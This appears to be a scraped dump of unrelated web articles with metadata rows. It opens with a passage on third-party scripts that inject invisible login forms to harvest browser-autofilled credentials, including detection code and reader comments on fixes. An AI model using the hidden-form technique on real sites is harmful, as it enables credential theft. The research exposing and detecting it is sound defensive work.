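      if (containsHiddenPasswordForm(added)) {
        // OpenWPM records the JavaScript call stack here to identify the
        // injecting script; console.trace() is a rough stand-in.
        console.trace("Hidden login form injected:", added);
      }
    }
  }
});

observer.observe(document.documentElement, { childList: true, subtree: true });
```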
To verify the findings of the automated experiments we manually analyzed sites that embed the two scripts that match these conditions. We have verified that the forms that the scripts inserted were not visible. We then opened accounts on the sites that allow registration and let the browser store the login information (by clicking yes to the dialog in Figure 1). We then visited another page on the site and verified that browser password manager filled the invisible form injected by the scripts.
**Appendix 2 – Code Snippets**
Has this autofill vulnerability been addressed by the browser manufacturers yet? Anyone know?
Safari “[d]isabled Automatic AutoFill of user names and passwords at page load to prevent sharing information without user consent” in Technology Preview 48, released just two days ago:
https://webkit.org/blog/8084/release-notes-for-safari-technology-preview-48/
(We have not had a chance to test this release yet)
Chrome and Firefox are also considering deploying a fix:
https://bugs.chromium.org/p/chromium/issues/detail?id=798492
https://bugzilla.mozilla.org/show_bug.cgi?id=1427543
I’m not a web-site developer, so excuse my web-dev ignorance, but this scenario struck me as a potential for exploitation.
Through the exploit method described, would it be possible for a site that has embedded (say) PayPal onto their web page (via a hidden iframe, or a window.open method where the source of the child window is manipulated somehow) to grab your PayPal login credentials, since the parent window is able to read (and modify??) elements of the child iframe or child window?
I understand that PayPal detects when it is running in an iframe and blocks rendering of any content. But does the same hold for a child window and other services?
See http://www.dyn-web.com/tutorials/iframes/refs/iframe.php which demonstrates controlling an iFrame from a parent window.
Hi AConcernedAussie,
That’d be a devastating attack but access to cross-origin frames will be prevented by the same-origin policy.
The post you linked to describes access to frames from the same origin.
Thanks Gunes
My instincts were telling me what you have said, but thought it worth asking 🙂
The link was for my benefit more than anyone elses, when I started looking at the possible broader outcomes
Hi,
My website is listed as a website using the audienceinsights JS script… but I find no trace of this script in my source code.
So I do not understand how you have found this script on my website and why it is listed in your article…
Could you please contact me and explain?
Maybe there is another JS file loading this script, but I am not able to find it.
Thanks for your help
David
Hi David,
Your site embeds media-clic.com, which loads a script from themoneytizer.com, which finally loads audienceinsights.net:
`https://www.excel-downloads.com/`
->
https://pub3.media-clic.com/www/delivery/asyncjs.js
->
https://ads.themoneytizer.com/s/requestform.js?siteId=10013&formatId=1
->
https://static.audienceinsights.net/t.js
Your site (excel-downloads.com) was crawled on 2017-09-13.
Thanks for your fine efforts on this subject.
Are there any legal minds in the group who can explain how this scripting and password capturing is NOT a violation of telecommunications intercept laws? Did we give away those privacy rights in a user agreement somewhere?
https://www.law.cornell.edu/uscode/text/18/2511
KeePass combined with the extension can autofill the password if the autofill is enabled (configurable through the extension).
For Gecko-based browsers, there is a signon.autofillForms option in about:config that can prevent the attack.
I am a bit confused here. Is it possible to extract and send all credentials stored within the browser’s password manager, or only the credentials for the particular site the user has visited (where the tracking script is not present on the login page)?
Thanks
Ankur
Hi Ankur,
Only the credentials saved for that particular domain can be extracted.
This is just one way you can be tracked online by third-party services. Plugging this “hole” wouldn’t do much to stop the tracking.
The standard way to integrate with a third-party network is for the site owner to place HTML code (either JavaScript or even an IMG tag) that sends the site’s own cookie ID for a user to the third party. The site can via a server-side API call, or via an offline batch process, send all user information associated with that cookie ID to the third party. The third-party code doesn’t need to “scrape” anything for this to work.
Of course, this requires cooperation of the primary website. But any site including tracking code is already working with the tracker.
Fixing this would also protect against malicious scripts that exploit the same vulnerability through XSS attacks or malvertising campaigns. The server-side communication is possible, but costly compared to including one line of JavaScript.
Keeper has written a response to this issue on our blog:
https://blog.keepersecurity.com/2018/01/02/response-princetons-center-information-technology-policy-article/
Per the 1Password comment above, would something like LastPass, with autofill enabled, also be vulnerable? I am guessing it would be.
I’ve tried the demo, but after sending the fake e-mail/password I only got an error page (404)…
On the next try it worked, but the result was two question marks 🙂
(I use Firefox with the NoScript addon)
But you’re right: if I allow running JS from rawgit, then it can steal my e-mail/password pair.
It is a little bit scary… 🙁
I use LastPass on Firefox but I also got 2 question marks – even with auto fill enabled.
Have I done something wrong?
Disclosure: I work for AgileBits, the makers of 1Password.
1Password is not vulnerable to this attack specifically because we have never allowed for “automatic autofill”. (Despite strong user request for such a behavior.) 1Password will automatically fill a form on the user’s command, but never without some user action.
We’ve required user action precisely because we consider the web page to be a very hostile environment. What David Silver refers to as “sweep attacks” have been known about both in theory and practice for quite some time. But even prior to learning of those, we felt that user action should be required.
Here is something I wrote in 2014 in response to some of the many customer requests for more automated behavior.
https://discussions.agilebits.com/discussion/comment/153916/#Comment_153916
That was what I thought when I read about this on BGR, but they specifically called out 1Password and LastPass browser plugins:
“To quickly fill in usernames and passwords saved in a password management app like 1Password and LastPass, you have probably installed browser addons. It’s those tiny browser apps that are targeted by scripts.”
Agile Bits also addressed this directly on their blog:
https://blog.agilebits.com/2017/12/30/1password-keeps-you-safe-by-keeping-you-in-the-loop/
If the 3rd party script is on a login page (which happens less according to the analysis, but still happens), a user might use the 1Password keyboard shortcut to fill in the legitimate form. Will 1Password fill in the credentials into the fake form too?
1Password does indeed autofill some sites I go to, including banking sites. I don’t understand Goldberg’s comment.
You must have had some other password manager (most likely that built-in to the browser) save those passwords if they’re being filled with no interaction on your part. 1Password indeed does not fill anything until you ask it to. It has no option to autofill a password upon page load.
Here, the Firefox addon Privacy Badger (PB) immediately flagged rawgit.com as a tracker and blocked the sniffer script. Probably it was known before? Sadly, it is not really an option to recommend PB: users do enjoy the faster page loads, but when a site breaks, and that can happen, they are clueless at first and then annoyed that PB cannot read their minds and they have to sort something out themselves, even though the PB interface is quite easy to use, IMO.
Just to clarify, we use RawGit (rawgit.com) to serve code from GitHub with the right content type.
https://github.com/rgrove/rawgit/blob/master/FAQ.md
RawGit is not responsible for any of the code that they seem to serve. Privacy Badger must have flagged it perhaps because some other sites embed code from GitHub through rawgit.com.
Anything that adds usability overhead to password manager auto-fill feels like a challenging proposal. (And user opt-out is always a relatively ineffective control to mitigate systemic issues like this.)
But what about auto-applying the write-only property to a form as soon as it’s been auto-filled? In other words, once the browser has auto-filled a field, the field is considered to be in a locked-down state with no further DOM access. That could create some publisher pain for those who are using JS to access the email field in legit ways to instrument a better login form, but that would be putting the burden on a small class of websites, and not on users using auto-fill.
That sounds like an interesting idea to explore. One can imagine that autofilled credentials do not need to be checked for password strength or duplicate usernames, which are common cases of legitimate script access to login forms. Still, one needs telemetry or web measurement data to back this up.
The question is whether browsers will ever ship write-only elements or similar protections 🙂
| true | true | true |
In this second installment of the "No Boundaries" series, we show how a long-known vulnerability in browsers’ built-in password managers is abused by
|
2024-10-12 00:00:00
|
2017-12-27 00:00:00
|
article
|
freedom-to-tinker.com
|
Freedom to Tinker
| null | null |
|
21,326,934 |
https://www.technologyreview.com/s/611165/does-the-brain-store-information-in-discrete-or-analog-form/
|
Does the brain store information in discrete or analog form?
|
Emerging Technology
|
# Does the brain store information in discrete or analog form?
For engineers, the question of whether to store information in analog or discrete form is easy to answer. Discrete data storage has clear advantages, not least of which is that it is much more robust against degradation.
Engineers have exploited this property. Provided noise is below some threshold level, digital music can be copied endlessly. By contrast, music stored in analog form, such as on cassette or vinyl LP, can be copied only a few times before noise degrades the recording beyond recognition.
The process of evolution has also exploited this advantage. DNA stores information in discrete form as a sequence of nucleotides and this allows the blueprint for life to be transmitted from one generation to the next with high fidelity.
So it’s easy to imagine that the question of how the brain stores information is easy to answer. Not so. Neuroscientists have long pondered this issue, and many believe that it probably uses some form of analog data storage. But the evidence in favor of discrete or analog data storage has never been decisive.
Today that changes at least in part, thanks to the work of James Tee and Desmond Taylor at the University of Canterbury in New Zealand. These guys have measured the way people make certain types of decisions and say that their statistical analysis of the results strongly suggests that the brain must store information in discrete form. Their conclusion has significant implications for neuroscientists and other researchers building devices to connect to the brain.
First, some background. One reason that neuroscientists are undecided on this issue is because neural signals are obviously analog in character. They generate analog electrical pulses in which the voltage potential varies between -40mV and -70mV at the cell membrane. So at first glance it’s easy to imagine that the data they carry is analog too.
That isn’t necessarily true. Electromagnetic signals are always analog at some level since it takes time for any circuit to switch from one state to another. However, the information encoded in these signals can be treated as discrete by ignoring these transitions.
So information transmitted along neurons could also be discrete. Indeed, there are good theoretical reasons to think it must be.
Back in 1948, the mathematician and engineer Claude Shannon published *A Mathematical Theory of Communication*, in which he showed how information stored in discrete form could be copied with arbitrarily small error, provided noise was below some threshold level.
By contrast, there is no equivalent theory for analog information, and attempts to approximate it by increasing the quantization of an analog signal into ever smaller parts suggest that it is nowhere near as robust. Indeed, Tee and Taylor say their theoretical analysis suggests that the brain cannot work like this. “It is impossible to communicate reliably between neurons under repeated transmissions using continuous representation,” they say.
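The intuition behind that claim can be reproduced with a toy simulation (our own sketch, not the authors' analysis): a value passed along verbatim accumulates noise on every retransmission, while a value that is re-thresholded at each hop is restored and survives as long as the per-hop noise stays below the decision threshold.

```typescript
// Toy illustration (not from the paper): noise accumulates over repeated
// analog retransmissions, while a thresholded (discrete) value is restored
// at every hop and survives as long as the noise stays below the threshold.

function gaussianNoise(sigma: number): number {
  // Box-Muller transform
  const u = Math.random() || 1e-12;
  const v = Math.random();
  return sigma * Math.sqrt(-2 * Math.log(u)) * Math.cos(2 * Math.PI * v);
}

const hops = 100;
const sigma = 0.05;

let analog = 0.7;     // passed along verbatim; errors accumulate
let bit = 1;          // re-decided against a 0.5 threshold at every hop

for (let i = 0; i < hops; i++) {
  analog += gaussianNoise(sigma);
  const received = bit + gaussianNoise(sigma); // noisy copy...
  bit = received > 0.5 ? 1 : 0;                // ...restored by the threshold
}

console.log(`analog value after ${hops} hops: ${analog.toFixed(3)}`); // drifts far from 0.7
console.log(`discrete bit after ${hops} hops: ${bit}`);               // almost surely still 1
```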
But the experimental evidence that the brain stores data discretely has been lacking. Until now. Tee and Taylor go on to say that if the brain stores information in discrete form, it should process it in a different way than analog information. And that should lead to a measurable difference in human behavior in certain decision-making processes.
In particular, Tee and Taylor focus on problems in which people have to make decisions based on their assessment of probabilities. If the brain is able to assess probabilities in a continuous way, this should lead to a range of human behavior that varies smoothly as the probabilities change.
However, if the human brain works on a discrete basis, it must treat some probabilities in the same way. For example, a person might judge probabilities as being low, medium, or high. In other words, the probabilities must be rounded into specific categories—probabilities of 0.23 and 0.27 might be treated as low, 0.45 and 0.55 as medium, and 0.85 and 0.95 as high, for example.
In that case the range of human behavior would follow a step-like structure that reflects the jump from low to medium to high risk.
So Tee and Taylor studied human decision-making as probabilities change. They did this by testing the way over 80 people judged and added probabilities associated with roulette wheels in more than 2,000 experimental trials.
The experiments employed a similar approach. For example, participants were shown a roulette wheel with a certain sector mapped out and asked to judge the probability of the ball landing in that sector. Then they were shown two wheels with different sectors mapped out. They had to judge the probability of the ball landing in both sectors. Finally, they were asked to judge whether the probability was higher in the case of the single roulette wheel or the double roulette wheel example.
The researchers then varied the size of sectors in the experiments to span a wide range of probabilities, in total carrying out 2,000 trials. Participants performed the tests in random order on a computer touch screen and were paid a token amount for their participation (although they also had the chance to win a bonus based on their performance).
The results make for interesting reading. Tee and Taylor say that far from matching the smooth distribution of behavior expected if the brain stores information in analog form, the results are more easily interpreted using a discrete model of information storage.
An important factor is the extent to which the brain quantizes the probabilities. For example, does it divide them into three or four or more categories? And how does this quantization change with the task at hand? In that respect, Tee and Taylor say that a 4-bit quantization best fits the data.
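To make "a 4-bit quantization" concrete (an illustration of uniform quantization only; the paper's model-fitting procedure is more involved), 4 bits give 2^4 = 16 representable levels, so any probability is snapped to the nearest level and probabilities closer together than about half a step become indistinguishable:

```typescript
// Sketch: uniform 4-bit quantization of a probability in [0, 1].
// 4 bits give 2 ** 4 = 16 representable levels; probabilities closer together
// than about half a step collapse onto the same stored value.
// Illustration only; the paper's fitting procedure is more involved.

function quantizeProbability(p: number, bits: number): number {
  const steps = 2 ** bits - 1;          // 15 steps -> 16 levels for 4 bits
  return Math.round(p * steps) / steps;
}

for (const p of [0.23, 0.27, 0.45, 0.55, 0.85, 0.95]) {
  console.log(p, "->", quantizeProbability(p, 4).toFixed(3));
}
// 0.23 -> 0.200, 0.27 -> 0.267, 0.45 -> 0.467,
// 0.55 -> 0.533, 0.85 -> 0.867, 0.95 -> 0.933
```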
“Overall, the results corroborate each other, supporting our discrete hypothesis of information representation in the brain,” conclude Tee and Taylor.
That’s an interesting result that has important consequences for future research in this area. “Going forward, we firmly believe that the correct research question to explore is no longer that of continuous versus discrete, but rather how fine-grained the discreteness is (how many bits of precision),” say Tee and Taylor. “It is very plausible that different parts of the brain operate at different levels of discreteness based on different numbers of quantization levels.”
Indeed, engineers have found this in designing products for the real world. Images are usually encoded with a 24-bit quantization, whereas music is generally quantized using a 16-bit system. This reflects the maximum resolution of our visual and auditory senses.
The work has implications for other areas too. There is increasing interest in devices that link directly with the brain. Such machine-brain interfaces will obviously benefit from a better understanding of how the brain processes and stores information, a long-term goal for neuroscientists. So research like this will help pave the way toward that goal.
Ref: arxiv.org/abs/1805.01631: Is Information in the Brain Represented in Continuous or Discrete Form?
| true | true | true |
New evidence in favor of a discrete form of data storage could change the way we understand the brain and the devices we build to interface with it.
|
2024-10-12 00:00:00
|
2018-05-21 00:00:00
| null |
article
|
technologyreview.com
|
MIT Technology Review
| null | null |
23,563,372 |
https://www.hq.nasa.gov/alsj/a11/as11psr.pdf
|
Apollo Lunar Surface Journal
| null |
Founder and Editor Emeritus
Eric M. Jones
Edited by Ken Glover
The Apollo Lunar Surface Journal is a record of the lunar surface operations conducted by the six pairs of astronauts who landed on the Moon from 1969 through 1972. The Journal is intended as a resource for anyone wanting to know what happened during the missions and why. It includes a corrected transcript of all recorded conversations between the lunar surface crews and Houston. The Journal also contains extensive, interwoven commentary by the Editor and by ten of the twelve moonwalking astronauts.
This December 2017 release of the Journal contains all of the text for the six successful landing missions as well as many photos, maps, equipment drawings, background documents, voice tracks, and video clips which, we hope, will help make the lunar experience more accessible and understandable.
The Journal is, in Neil Armstrong's words, a "living document" and is constantly being modified and updated. Please don't hesitate to let us know about errors. We want to get it right, but sometimes that can take a while. We would like to thank everyone for their help and patience. You may email the editors concerning typos, factual errors, or with general comments at:
The corrected transcript, commentary, and other text incorporated in the Apollo Lunar Surface Journal is protected by copyright. Individuals may make copies for personal use; but unauthorized production of copies for sale is prohibited. Unauthorized commercial use of copyright-protected material from the Apollo Lunar Surface Journal is prohibited; and the commercial use of the name or likeness of any of the astronauts without his express permission is prohibited.
The United States Government retains a non-exclusive, royalty-free license to publish or reproduce the published form of the Apollo Lunar Surface Journal, or to allow others to do so, for U.S. Government purposes.
**Dedication: To Di and HP, the sources of my serenity; and to the memory of my uncle, Leslie M. Jones,
who explored the upper atmosphere with rocket-borne instruments
and excited my interest in space.**
Page design by:
Gordon Roxburgh, Brian Lawrence and Ken Glover.
NASA Host:
Steve Garber
**Copyright © 1995-2018 by Eric M. Jones.
All rights reserved.
Last revised 05 June 2018.**
| true | true | true | null |
2024-10-12 00:00:00
|
2018-06-05 00:00:00
| null | null | null | null | null | null |
7,521,233 |
http://www.businessinsider.com/protestors-blocked-a-tech-bus-this-morning-with-vomit-2014-4
|
Protestors Blocked A Tech Bus This Morning With Vomit
|
Karyne Levy
|
Yeah, you read that right.
At the MacArthur BART station in Oakland, Calif., this morning, protestors blocked several tech buses for more than 30 minutes. A couple of the protestors climbed aboard the Yahoo bus and vomited on the windshield.
We're used to seeing plenty of colorful signs, of course, and yesterday, people dressed like clowns blocked the Google bus in the Mission neighborhood in San Francisco.
But barf takes it to a whole new level.
As Re/code points out, the protestors' anger may not be out of left field. The San Francisco Board of Supervisors last night denied an appeal by anti-shuttle proponents, who want to stop the buses from using public bus stops for a fee.
Check out some of the photos and tweets from the latest round of protests below:
3 #techbus blockaded at MacArthur Bart, police on scene #googlebus pic.twitter.com/8MD4eKkFAi
— The Red Son (@revscript) April 2, 2014
Like a Lady Gaga concert? MT “@revscript: Protester on roof of yahoo bus vomits on windshield #techbus #googlebus pic.twitter.com/990Hx6jOHI”
— Karl Mondon (@karlmondon) April 2, 2014
Yahoo bus blockaded at MacArthur station #googlebus #techbus all of your base are belong to us! pic.twitter.com/YWcTv6pMRV
— The Red Son (@revscript) April 2, 2014
This was at Macarthur @SFBART today. No police in sight. #googlebus @SFist pic.twitter.com/suVyQgIR7d
— Anton Molodetskiy (@AntonM) April 2, 2014
| true | true | true |
Yeah, you read that right.
|
2024-10-12 00:00:00
|
2014-04-03 00:00:00
|
https://i.insider.com/533c8cd56bb3f77811b5b892?width=840&format=jpeg
|
article
|
businessinsider.com
|
Insider
| null | null |
7,185,949 |
http://www.google.com/there-is-a-typo-in-title
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
304,804 |
http://www.alleyinsider.com/2008/9/wall-street-s-collapse-delivers-an-overdue-wake-up-call-to-startups
|
Wall Street's Collapse Delivers An Overdue Wake Up Call To Startups
|
Hank Williams
|
Today Lehman is filing for Chapter 11 bankruptcy protection, and Merrill Lynch is being bought for chicken feed by Bank of America.
The Wall Street sky is falling. But what does that mean to tech companies, and particularly to startups?
The last five or six years have been all about community, "social media" and other related types of communications. That era has ended and the next phase of the Web will be about *real* productivity. That means products that make you more efficient, and more effective. It means software that saves you money or makes you money. And yes, we are really going to have to start paying for the good stuff.
One theme that has been emerging is being referred to as "web meets world". It's an idea that has been discussed by Brad Burnham from Union Square Ventures, and also the folks at the Web 2.0 Summit. The concept is that the web needs to actually help you do things in the real world, and not just meet other folks on the web. I think this is all true but it is really just a fancy abstraction for helping people do things that matter, and things that they will pay for. As an example, Union Square just invested in Meetup -- a terrific investment. Meetup makes real money charging people for helping connect them to other people. They are providing real value and so people pay real money.
I find this "web meets world" concept particularly interesting because of a controversial piece I wrote back in April called "Free Is Killing Us, Blame The VCs." The core of my thesis in that piece is not that free is inherently bad, but that too much free was distorting the value of the market because the free is only supported by VC money and not real value being delivered to users.
As a result, I opined, it was way too hard to start a small business and to grow it because you need to "get to scale" since everything is expected to be free and monetized by advertising, which requires lots of users. Perhaps the idea people found most objectionable was when I said the following:
In today’s “free” world, in most online business categories, it is inherently impossible to start a small self-sustaining business and to grow it. This is because in the digital world, advertising, the only real revenue stream, cannot support a small digital business. If businesses were based on the idea that people paid for services then small companies could succeed at a small scale and grow. But it is very hard to charge when your competition is free.
People really objected to the idea that "in most online business categories, it is inherently impossible to start a small self-sustaining business and to grow it." And of course there is room for debate here. But what is not debatable is that by and large, tech startups engaged in offering totally free services (I am not talking about freemium here) are not making money, and they are not getting acquired. It's fine not to get acquired, but you can't do that very long if you're not making money. And now that "free" VC capital is drying up, sustaining such businesses will be really tough.
Interestingly, at the time, Brad, among many others, took me to task for having a dated view of the online world, and for not understanding how it really works.
But in my view, Brad's stated new thesis is exactly in line with my writing at the time. "web meets world" really might be better phrased "web meets money." There will be fewer and fewer companies getting funded by offering services that help online folks interact with other online folks, because cool as it is, people won't pay for it, and the bottom is going to fall out. Brad and Union Square's new investment thesis is the canary in the coalmine for that strategy.
Brad's rebuttal to my April piece talks a lot about new business models that are going to emerge that I am just missing. But five months later, I see no evidence of it, and "web meets world" to me, suggests that in their heart of hearts, they don't either.
In fact, I think companies like 37 Signals have had it right all along. They preach charging people for services, staying small, and adding real productive value. Scale is irrelevant in this model because the software adds value to the individual without the network effect. In this model, scale is a benefit, not a requirement. I am not saying there will not be successful advertising-based companies, but I am saying they will have to solve really serious issues like improving the value equation of online banner ads, in order to be successful.
As I see it, this is a fantastic shift in the marketplace, because it means if you have a company that adds real value, you are less likely to get thrown off course by a flood of capital creating unsustainable competition. I am very happy the venture markets are making this shift.
*SAI Contributor Hank Williams is a New York-based entrepreneur. He writes Why Does Everything Suck? Exploring the tech marketplace from 10,000 feet.*
| true | true | true | null |
2024-10-12 00:00:00
|
2008-09-15 00:00:00
|
article
|
businessinsider.com
|
Insider
| null | null |
|
23,831,028 |
https://insights.dice.com/2020/07/14/remote-work-security-nightmare-how-do-we-fix-it/
|
Remote Work Is a Security Nightmare. How Do We Fix It?
|
Dice Staff
|
When organizations made the decision earlier this year that work-from-home was the new norm during the COVID-19 pandemic, it appears that many considered security an afterthought.
It’s been well-documented that almost as soon as the World Health Organization (WHO) formally declared COVID-19 a pandemic in March, phishing emails and spam attacks increased as fraudsters and cybercriminals attempted to either spread malware or steal credentials.
At the same time, the pandemic forced many organizations to send workers home and have them perform their duties from there—even when many employees didn’t have experience working remotely, or adequate security in place to ensure that they weren’t targeted by attackers looking for easy ways to steal data or infiltrate a large corporate network.
How inadequate was the security response to the WFH shift? A recent survey conducted by IBM Security and polling firm Morning Consult of 2,000 U.S. adults who are now working from home sheds some light on what’s changed—and what CISOs and their security teams need to do to fix this issue.
**Survey Reveals Lack of Security**
The IBM and Morning Consult study found that 93 percent of those surveyed were confident of their organization’s ability to keep personal identifiable information (PII) secure while working remotely. At the same time, however, 52 percent report that they are using their personal laptops for work—often with no new tools to secure it—and 45 percent haven’t received any new security training.
Digging further into the study, another 61 percent of respondents report that their organizations have not given them new security tools to help protect those laptops and other devices, even though they are now connected to corporate networks that may contain sensitive data. The study also found that 66 percent of respondents have not been provided with new password management guidelines, while 35 percent said that they are still reusing passwords for business accounts.
Charles Henderson, the global managing partner and head of IBM X-Force Red, believes that responses to the survey show that the rush to move workers into home offices meant security considerations were put off.
“The biggest takeaway here is that employees and organizations are not prepared for our new work-from-home normal, and the data shows it's because their employers aren't giving them the resources they need,” Henderson told Dice. “Now, it should also be noted that the reason these resources aren't available is because many organizations were rushed to adopt work from home models.”
He added: “Organizations weren't prepared for this remote shift and are now just starting to rethink the security aspects of it. At the end of the day, keeping the lights on is more important to organizations than security. While security may be a component of keeping the lights on, in 2020, there have been business continuity risks that organizations have just never seen before.”
**Beyond Shadow IT**
The IBM and Morning Consult survey also calls to mind a term, once out of fashion, that is starting to creep back into conversations. It’s the notion of “Shadow IT,” where workers are using devices or services not approved by the IT department and that lack strong security protections.
One of the main reasons Shadow IT has returned at this moment is that, when many workers were sent home, laptops and other equipment remained in short supply. This means some employees improvised and used personal devices to get the job done, Henderson explained.
The big difference now is that almost everyone in the organization is using Shadow IT. “I think the biggest takeaway from this is that this is a new reality for organizations,” Henderson said. “Shadow IT implies compartmentalized rogue usage—and right now, it’s not rogue if everyone is doing it. When the majority of an organization goes rogue, they’re no longer rogue.”
The consequence of this is that, by mixing business and personal devices, as well as corporate and personal passwords, employees and their organizations are vulnerable to hacking, whether it’s through brute-force attack methods or credential stuffing. It’s one reason why now is the time to rethink the security controls and processes that are in place.
“If employees aren’t provided the tools to do their jobs, they will seek ways to do things on their own,” Henderson said. “When we see that 35 percent of those new to working from home are reusing passwords for business apps or accounts, it also highlights an opportunity for organizations to offer solutions like password managers to help employees avoid password reuse.”
**Rethinking Security Post-COVID-19**
To counter some of the security issues that have crept in since work-from-home started, Lisa Plaggemier, chief strategy officer at MediaPro, which provides cybersecurity and privacy education, believes that now is the time for security teams to start raising awareness of the potential cyberthreats that lurk in home offices.
Plaggemier suggests starting out by sending good security practice reminders in company newsletters, Slack channels or other ways employees communicate.
Another way to improve cyber hygiene is for the security team to start leveraging the IT help desk and build good security practices when employees reach out for technical help.
“Leverage your IT help desk staff to provide security advice. If they’re helping an employee with their home router, ask if the password is complex and unique—and hopefully not still the default password,” Plaggemier told Dice. “Calls to the help desk for password reset issues should be accompanied by advice on password complexity. Give your IT staff some pre-built messaging to help them communicate important points to employees.”
IBM’s Henderson advises to go beyond training, and encourages CISOs and their teams to conduct more threat modeling and adversary simulation to help better understand how attackers can exploit weaknesses, especially when targeting WFH environments. With that knowledge, organizations can build a better defense.
“I advise clients to use the results to answer these two questions: How do I better detect an attack, and how do I better protect myself from an attack? This helps to identify security gaps in this new normal,” Henderson said.
| true | true | true |
When organizations made the decision earlier this year that work-from-home was the new norm during the COVID-19 pandemic, it appears that many considered security an afterthought.
|
2024-10-12 00:00:00
|
2020-07-14 00:00:00
|
Article
|
dice.com
|
Dice
| null | null |
|
36,429,353 |
https://www.wsj.com/articles/sesame-allergy-sufferers-wanted-warning-labels-they-got-more-sesame-283c70ce
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,162,469 |
https://techxplore.com/news/2018-10-startup-d-reinvent-production-metal.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,278,390 |
http://www.theregister.co.uk/2013/02/25/cross_platform_abstraction/
|
You've made an app for Android, iOS, Windows - what about the user interface?
|
Tim Anderson
|
# You've made an app for Android, iOS, Windows - what about the user interface?
## Where to find a sane design for all platforms
Cross-platform development is a big deal, and will continue to be so until a day comes when everyone uses the same platform. Android? HTML? WebKit? iOS? Windows?
Maybe one day, but for now the world is multi-platform, and unless you can afford to ignore all platforms but one, or to develop independent projects for each platform, some kind of cross-platform approach makes sense, especially in mobile.
Sometimes I hear it said that there are essentially two approaches to cross-platform mobile apps. You can either use an embedded browser control and write a web app wrapped as a native app, as in Adobe PhoneGap/Cordova or the similar approach taken by Sencha, or you can use a cross-platform tool that creates native apps, such as Xamarin Studio, Appcelerator Titanium, or Embarcardero FireMonkey.
Within the second category though, there is diversity. In particular, they vary concerning the extent to which they abstract the user interface.
Here is the trade-off: If you design your cross-platform framework to include user interface widgets, like labels, buttons, grids and menus, then you can have your application work almost the same way on every platform. You can also have tools that build the user interface once for all the platforms. This is a big win in terms of coding effort. If the framework is well implemented, it will still adopt some of the characteristics native to each platform so that it looks more or less native.
Some tools do this by drawing their own controls. Embarcadero FireMonkey is in this category. Another approach is to use native controls where possible (in other words, to call the API that shows a button, rather than drawing the button with the graphics API), but to use custom drawing where necessary, even sometimes implementing a control from one platform on another. The downside is that because those controls are not in fact native, there will be some differences, perhaps obvious, perhaps subtle. Martin Fowler at ThoughtWorks refers to this as the uncanny valley and argues against emulated controls.
Further, if you are sharing the UI design across all platforms, it is hard to make your design feel equally right in all cases. It might be better to take the approach adopted by most games, using a design that is distinctive to your app and make a virtue of its consistency across platforms, even though it does not have the native look and feel on any platform.
Xamarin Studio on the other hand makes no attempt to provide a shared GUI framework.
Xamarin chief executive Nat Friedman told me: “We don’t try to provide a user interface abstraction layer that works across all the platforms. We think that’s a bad approach that leads to lowest common denominator user interfaces.”
I have never understood this use of the term “lowest common denominator”. The LCD in maths is the lowest number into which a specific group of numbers divide exactly, so it is an elegant thing. In cross-platform what you should strive for is the highest common intersection: to make available all the features common to each platform.
Having said that, Friedman is right; but the downside is the effort involved in maintaining two or more user interface designs for your app.
This is an old debate. One of the reasons IBM created Eclipse was a disagreement with Sun Microsystems over the best way to design a cross-platform user interface framework. Sun’s Swing framework, derived from Netscape’s Internet Foundation Classes first released in 1996, takes the custom-drawn approach, which is why Swing apps always look like Swing apps (even if you apply the “Windows” look and feel). A team from IBM, some originally from Object Technology International which was a company acquired by IBM, believed it was better to wrap native controls with a Java abstraction layer, created SWT (Standard Widget Toolkit) to do that, and used it to build Eclipse.
Personally I am wary of toolkits which rely heavily on custom-drawn controls rather than native controls, though I see their value. On the other hand, Xamarin Studio is so far in the other direction that it removes some of the benefit of a cross-platform framework.
My prediction is that Xamarin will come up with its own GUI abstraction framework in future, along the lines of SWT. It is a compromise; but one which delivers a lot of value to developers who want to create cross-platform apps with the maximum amount of shared code. ®
This piece first appeared on Tim Anderson's *IT Writing* website, here.
| true | true | true |
Where to find a sane design for all platforms
|
2024-10-12 00:00:00
|
2013-02-25 00:00:00
| null |
article
|
theregister.com
|
The Register
| null | null |
23,552,859 |
https://www.theguardian.com/world/2020/jun/17/pandemics-destruction-nature-un-who-legislation-trade-green-recovery
|
Pandemics result from destruction of nature, say UN and WHO
|
Damian Carrington
|
Pandemics such as coronavirus are the result of humanity’s destruction of nature, according to leaders at the UN, WHO and WWF International, and the world has been ignoring this stark reality for decades.
The illegal and unsustainable wildlife trade as well as the devastation of forests and other wild places were still the driving forces behind the increasing number of diseases leaping from wildlife to humans, the leaders told the Guardian.
They are calling for a green and healthy recovery from the Covid-19 pandemic, in particular by reforming destructive farming and unsustainable diets.
A WWF report, also published on Wednesday, warns: “The risk of a new [wildlife-to-human] disease emerging in the future is higher than ever, with the potential to wreak havoc on health, economies and global security.”
WWF’s head in the UK said post-Brexit trade deals that fail to protect nature would leave Britain “complicit in increasing the risk of the next pandemic”.
High-level figures have issued a series of warnings since March, with the world’s leading biodiversity experts saying even more deadly disease outbreaks are likely in future unless the rampant destruction of the natural world is rapidly halted.
Earlier in June, the UN environment chief and a leading economist said Covid-19 was an “SOS signal for the human enterprise” and that current economic thinking did not recognise that human wealth depends on nature’s health.
“We have seen many diseases emerge over the years, such as Zika, Aids, Sars and Ebola and they all originated from animal populations under conditions of severe environmental pressures,” said Elizabeth Maruma Mrema, head of the UN convention on biological diversity, Maria Neira, the World Health Organization director for environment and health, and Marco Lambertini, head of WWF International, in the Guardian article.
With coronavirus, “these outbreaks are manifestations of our dangerously unbalanced relationship with nature”, they said. “They all illustrate that our own destructive behaviour towards nature is endangering our own health – a stark reality we’ve been collectively ignoring for decades.
“Worryingly, while Covid-19 has given us yet another reason to protect and preserve nature, we have seen the reverse take place. From the Greater Mekong, to the Amazon and Madagascar, alarming reports have emerged of increased poaching, illegal logging and forest fires, while many countries are engaging in hasty environmental rollbacks and cuts in funding for conservation. This all comes at a time when we need it most.
“We must embrace a just, healthy and green recovery and kickstart a wider transformation towards a model that values nature as the foundation for a healthy society. Not doing so, and instead attempting to save money by neglecting environmental protection, health systems, and social safety nets, has already proven to be a false economy. The bill will be paid many times over.”
The WWF report concludes the key drivers for diseases that move from wild animals to humans are the destruction of nature, the intensification of agriculture and livestock production, as well as the trading and consumption of high-risk wildlife.
The report urges all governments to introduce and enforce laws to eliminate the destruction of nature from supply chains of goods and on the public to make their diets more sustainable.
Beef, palm oil and soy are among the commodities frequently linked to deforestation and scientists have said avoiding meat and dairy products is the single biggest way for people to reduce their environmental impact on the planet.
